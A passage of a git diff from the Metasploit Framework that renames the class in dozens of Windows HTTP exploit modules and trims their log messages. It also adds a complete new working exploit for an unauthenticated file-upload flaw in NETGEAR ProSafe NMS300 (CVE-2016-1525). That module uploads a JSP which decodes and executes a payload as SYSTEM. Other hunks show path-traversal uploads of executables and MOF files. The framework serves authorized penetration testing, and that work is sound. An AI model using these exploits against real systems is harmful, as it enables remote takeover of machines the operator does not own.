Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] } diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index abe6834898..9dac1e3d1a 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx" - print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") + print_status("Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") + print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" - print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") + print_status("Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -162,10 +162,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") + print_error("Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 44441df158..367e93543a 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" - print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + print_status("Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end @@ -86,25 +86,25 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" - print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + print_status("Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload_name, 3) end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 83fd3da795..0d0fd3e481 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /MailEnable/ ] } diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 14391ebab3..f707b34c05 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine OpManager") + vprint_status("Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), @@ -109,14 +109,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 - print_status("#{peer} - Retrieved API key [ #{api_key} ]") + print_status("Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index e017dd250a..ebbada86aa 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index e69b65abee..2cd98114c1 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 1764bf01ea..f9e6f01222 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 4488698868..5f6da07f06 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 5a33167929..42d991ab2d 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 3f17071de0..f6ae402ff7 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index f02594d536..ffdcf97b1d 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 23aa9083fa..eb5fc32a50 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /MiniWeb/ ] } @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload(filename, filedata) - print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'") + print_status("Trying to upload '#{::File.basename(filename)}'") uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}") depth = "../" * (datastore['DEPTH'] + rand(10)) @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote # upload exe exe_name = "WINDOWS/system32/#{fname}.exe" exe = generate_payload_exe - print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)") + print_status("Sending executable (#{exe.length.to_s} bytes)") upload(exe_name, exe) # upload mof mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)") + print_status("Sending MOF (#{mof.length.to_s} bytes)") upload(mof_name, mof) # list files to clean up diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d9c46a3d2a..4298f850fb 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /InterVations/ ] } diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index b897f791b1..7d9bfc54af 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb new file mode 100644 index 0000000000..8e00ad258d --- /dev/null +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -0,0 +1,143 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', + 'Description' => %q{ + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file upload vulnerability that can be exploited by an + unauthenticated remote attacker to execute code as the SYSTEM user. + Two servlets are vulnerable, FileUploadController (located at + /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). + This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and + 1.1.0.13. + }, + 'Author' => + [ + 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-1525'], + ['US-CERT-VU', '777024'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] + ], + 'DefaultOptions' => { 'WfsDelay' => 5 }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Privileged' => true, + 'Targets' => + [ + [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 4 2016')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, "Application path", '/']) + ], self.class) + end + + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'GET' + }) + if res && res.code == 405 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + end + + + def generate_jsp_payload + exe = generate_payload_exe + base64_exe = Rex::Text.encode_base64(exe) + payload_name = rand_text_alpha(rand(6)+3) + + var_raw = 'a' + rand_text_alpha(rand(8) + 3) + var_ostream = 'b' + rand_text_alpha(rand(8) + 3) + var_buf = 'c' + rand_text_alpha(rand(8) + 3) + var_decoder = 'd' + rand_text_alpha(rand(8) + 3) + var_tmp = 'e' + rand_text_alpha(rand(8) + 3) + var_path = 'f' + rand_text_alpha(rand(8) + 3) + var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + <% + try { + String #{var_buf} = "#{base64_exe}"; + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + + File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); + + BufferedOutputStream #{var_ostream} = + new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + } catch (Exception e) { + } + %> + | + + jsp.gsub!(/[\n\t\r]/, '') + + return jsp + end + + + def exploit + jsp_payload = generate_jsp_payload + + jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) + jsp_full_name = "null#{jsp_name}.jsp" + post_data = Rex::MIME::Message.new + post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') + post_data.add_part(jsp_payload, + "application/octet-stream", 'binary', + "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") + data = post_data.to_s + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ + print_status("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::Unknown, "#{peer} - Payload upload failed") + end + + print_status("#{peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), + 'method' => 'GET' + }) + handler + end +end diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 466ddbbae6..465490a72b 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index af793df59f..aee9177369 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def check v = get_version - print_status("#{peer} - Detected version: #{v || 'Unknown'}") + print_status("Detected version: #{v || 'Unknown'}") if v.nil? return Exploit::CheckCode::Unknown @@ -133,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit() begin - print_status("#{peer} - Checking application version...") + print_status("Checking application version...") v = get_version if v.nil? - print_error("#{peer} - Unable to detect version, abort!") + print_error("Unable to detect version, abort!") return end - print_good("#{peer} - Found Version #{v}") - print_status("#{peer} - Setting up poisoned session") + print_good("Found Version #{v}") + print_status("Setting up poisoned session") session_id,cmd = setup_session() - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") fname = upload_shell(session_id,cmd) - print_status("#{peer} - Executing payload") + print_status("Executing payload") exec_shell(session_id,cmd,fname) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index d52305bdb8..0f80454e8c 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 05f4c9ecb3..5bbf6d1524 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 06b563e0cf..c59eeaa693 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index 19dbbe04ce..0bb82f0dd7 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index 12a2318607..de558a196a 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index c9abd7bfad..81a88ca3d0 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs" - print_status("#{peer} - Uploading the VBS payload") + print_status("Uploading the VBS payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - VBS payload successfully uploaded") + print_status("VBS payload successfully uploaded") else - print_error("#{peer} - Failed to upload the VBS payload") + print_error("Failed to upload the VBS payload") return end @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote soap_request << " </soapenv:Body>" soap_request << "</soapenv:Envelope>" - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") res = send_request_cgi( { @@ -204,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - MOF file successfully uploaded") + print_status("MOF file successfully uploaded") else - print_error("#{peer} - Failed to upload the MOF file") + print_error("Failed to upload the MOF file") return end @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp" - print_status("#{peer} - Uploading the JSP payload") + print_status("Uploading the JSP payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -249,13 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - JSP payload successfully uploaded") + print_status("JSP payload successfully uploaded") else - print_error("#{peer} - Failed to upload the JSP payload") + print_error("Failed to upload the JSP payload") return end - print_status("#{peer} - Executing the uploaded JSP #{@jsp_name}.jsp ...") + print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...") res = send_request_cgi( { 'uri' => "/#{@jsp_name}.jsp", diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index fd94612b71..a48a151838 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote version = version_match[1] end - vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Appears @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") execute_command(command) end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3a580df1fb..054f5b890e 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -86,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating payload and mof file...") + print_status("Generating payload and mof file...") mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" exe_content = generate_payload_exe mof_content = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading the exe payload #{exe_name}...") + print_status("Uploading the exe payload #{exe_name}...") exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" res = upload(exe_traversal, exe_content) unless res && res.code == 200 && res.body.blank? - print_error("#{peer} - Unexpected answer, trying anyway...") + print_error("Unexpected answer, trying anyway...") end register_file_for_cleanup(exe_name) - print_status("#{peer} - Uploading the MOF file #{mof_name}") + print_status("Uploading the MOF file #{mof_name}") mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" upload(mof_traversal, mof_content) register_file_for_cleanup("wbem/mof/good/#{mof_name}") diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index e8f3f218c1..25b9326857 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 6d1632f045..d8e514ffab 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 4b7e9feccf..04e9ee1427 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 3671981570..2ad78064a3 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 9c50701f47..f387140d39 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class 